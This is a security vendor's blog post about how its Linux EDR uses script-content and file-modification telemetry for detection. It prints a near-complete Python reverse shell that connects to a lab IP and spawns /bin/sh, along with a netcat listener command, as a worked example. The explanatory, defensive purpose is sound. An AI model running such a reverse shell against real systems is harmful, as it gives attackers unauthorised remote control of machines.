Red Canary’s Linux EDR provides comprehensive protection across your Linux environments by helping to identify and stop runtime threats. Built from the ground up for Linux, our sensor is designed to minimize performance impact while tracking the unique sets of threats that Linux faces. This blog will demonstrate how combining various types of data allows us to have higher-fidelity detection capabilities and better serve and protect our customers.
Insights from scriptload data
Endpoint detection and response (EDR) products generally provide a process-centric view of events that happen on an endpoint. This means that they try to provide data around process activity and metadata. This, however, does not paint the whole picture or provide the full context. In some cases, greater context is needed around some of the events that processes generate.
One example of this is scriptload data. Scriptload data refers to obtaining information about a script running. This information could be the hash of the script, the name and path, and even the script’s contents. A script could come in the form of Perl, Python, Bash, or any other file that gets interpreted.
Linux EDR has the ability to not just report that a script was run but also collect the contents of the script as well as metadata around it. It can do this for scripts that are run on the host and scripts that are run inside of containers.
Why does getting this extra information matter?
- We can see exactly what a script is doing and correlate other events with the process.
- We can see any built-in commands that an interpreter might use. This will vary widely based on what type of script is being run.
- It allows us to tell a better story when it comes to writing a detection report or trying to perform threat hunting around this event.
Analyzing a Python reverse shell
To demonstrate why the extra context here is important, let’s look now at an example of a script that creates a reverse shell on a machine. A common tool for adversaries, reverse shells typically looks something like this:
Step 1:
Step 2:
Step 3:
Now let’s break down the script that creates a reverse shell into its relevant components:
First, we need to import any relevant dependencies.
#! /usr/bin/python3
import socket,subprocess,os
Next, we will create a TCP socket and attempt to connect to the machine that will be used as the controlling machine.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.181.130",12345))
Then, we will map the socket file descriptor to stdin
, stdout
and stderr
.
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
Finally, the script starts an interactive shell. Since we mapped the file descriptors to the socket, this will allow stdin
, stdout
, and stderr
to go through the socket.
pty.spawn("/bin/sh")
Before running the script, we set up a netcat listener on another machine using the following command:
$ nc -l 12345
Now, we run the Python script as follows:
$ ./reverse.py
At this point, the user on the machine we ran netcat
on should be able to run commands as if they were in a terminal in the target machine.
The view from Linux EDR
Now let’s dive into how Linux EDR views the telemetry that is generated from the adversary’s machine but run on the target machine. The process tree will look something like this:
As commands were executed, it would appear as though the parent process was sh
, not the Python reverse shell. This can be further muddled if the attack was to then start another shell or some series of commands that created many children and grandchildren processes.
When writing detection logic for process events, analysts often include process path, process name, command-line parameters, etc. In our example here, we would see a process start event for python3
with no command-line arguments. We would see a process start for sh
with no command-line arguments. You might assume a Python process spawning a shell is unusual but you would quickly find it is not uncommon at all. Or maybe you would try and correspond some network data such as the Python process connecting to an IP address and port and also spawning a shell. Only knowing that a Python process made a connection at some point and spawned a shell at some point does not indicate much.
Instead of relying on attributes of process events or their ancestry or even the more advanced approach of associating network activity with process data, what if we could examine the script itself?
Examining scriptload data
Within the contents of the Python script, we could potentially capture valuable information such as IP address and port. In our example they were hardcoded, but even if they weren’t, we could see where the values came from and likely be able to extrapolate the final address and port. Next, we would be able to see that the adversary is mapping stdin
, stdout
, and stderr
to the socket that was created and then immediately spawning a shell. This is powerful evidence that this Python script is intended to create a reverse shell.
With just process data or even surrounding data, it was hard (or maybe even impossible) to see that the socket was being mapped to the file descriptors before the shell was spawned. We can create alerts off of this information and then allow other associations to be made as the timeline of events is stitched together.
This knowledge also allows us to confidently correlate that shell process with commands from a reverse shell. Threat hunting will be a lot easier now that we’ve identified that subsequent commands are originating from a reverse shell.
Examining file modifications
In a similar respect to what we see with scriptload data, we also can gain useful insight when analyzing file modification (filemod) telemetry. We consider file modification to be file creation, deletion, renaming, and editing. It is beneficial to not only analyze how a process was started and in what context, but also to see what resources on the system it may have created/modified. Since everything is a file on Linux, being able to see which files were created, deleted, edited, or renamed gives crucial insight into what an adversary may have been attempting to do. For example, if we suspect an attack has occurred, seeing suspicious processes creating cron jobs or systemd
unit files would indicate the adversary was trying to establish persistence (T1053.003 and T1543.002). Finally, filemod data allows us to better help customers during the remediation process when an attack has occurred.
Conclusion
The inclusion of scriptload and filemod telemetry significantly enhances our ability to detect and defend against unique Linux threats. These data sources provide additional information and context that process data doesn’t provide on its own, such as hardcoded data where activity is spawning from or suspicious activity around files. With this powerful combination, we are better able to identify malicious behaviors with higher precision.